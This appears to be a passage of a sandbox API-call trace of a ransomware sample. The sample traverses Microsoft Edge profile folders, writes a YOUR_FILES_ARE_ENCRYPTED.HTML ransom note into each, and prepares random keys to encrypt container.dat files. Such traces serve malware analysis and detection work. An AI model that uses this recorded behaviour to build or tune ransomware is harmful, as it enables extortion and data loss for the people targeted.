0x6d77d0 [0116.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.252] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.253] CloseHandle (hObject=0x31c) returned 1 [0116.253] GetProcessHeap () returned 0x600000 [0116.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.253] GetProcessHeap () returned 0x600000 [0116.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.253] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="Cookies", cAlternateFileName="")) returned 1 [0116.253] StrStrIW (lpFirst="Cookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.253] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies") returned 111 [0116.253] GetProcessHeap () returned 0x600000 [0116.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.254] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies" [0116.254] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies\\*" [0116.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.254] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.254] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 0 [0116.254] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.254] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0116.254] GetProcessHeap () returned 0x600000 [0116.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\cookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.255] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.255] CloseHandle (hObject=0x31c) returned 1 [0116.256] GetProcessHeap () returned 0x600000 [0116.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.256] GetProcessHeap () returned 0x600000 [0116.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.260] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="History", cAlternateFileName="")) returned 1 [0116.260] StrStrIW (lpFirst="History", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.260] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History") returned 111 [0116.260] GetProcessHeap () returned 0x600000 [0116.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.264] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History" [0116.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History\\*" [0116.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.264] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.264] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x422c7d8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x422c7d8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 0 [0116.264] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.265] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0116.265] GetProcessHeap () returned 0x600000 [0116.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.266] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.267] CloseHandle (hObject=0x31c) returned 1 [0116.267] GetProcessHeap () returned 0x600000 [0116.267] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.267] GetProcessHeap () returned 0x600000 [0116.267] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.267] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0116.267] StrStrIW (lpFirst="IECompatCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.267] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache") returned 117 [0116.267] GetProcessHeap () returned 0x600000 [0116.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.267] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache" [0116.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\*" [0116.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0116.267] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.268] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0116.268] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.268] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\container.dat") returned 131 [0116.268] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.268] lstrlenW (lpString=".dat") returned 4 [0116.268] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.268] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0116.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\iecompatcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0116.268] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0116.269] CloseHandle (hObject=0x324) returned 1 [0116.269] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0116.269] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0116.269] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0116.269] GetProcessHeap () returned 0x600000 [0116.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\iecompatcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.270] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.271] CloseHandle (hObject=0x31c) returned 1 [0116.271] GetProcessHeap () returned 0x600000 [0116.271] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.271] GetProcessHeap () returned 0x600000 [0116.271] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.272] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x45274d0, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x45274d0, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="IECompatUaCache", cAlternateFileName="IECOMP~2")) returned 1 [0116.272] StrStrIW (lpFirst="IECompatUaCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.272] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache") returned 119 [0116.272] GetProcessHeap () returned 0x600000 [0116.272] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.274] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache" [0116.274] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\*" [0116.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x45274d0, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x45274d0, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.274] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x45274d0, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x45274d0, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.274] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x45274d0, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x45274d0, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0116.274] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.274] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\container.dat") returned 133 [0116.274] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.274] lstrlenW (lpString=".dat") returned 4 [0116.274] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.274] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0116.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\iecompatuacache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0116.275] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0116.275] CloseHandle (hObject=0x324) returned 1 [0116.275] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x45274d0, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x45274d0, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, 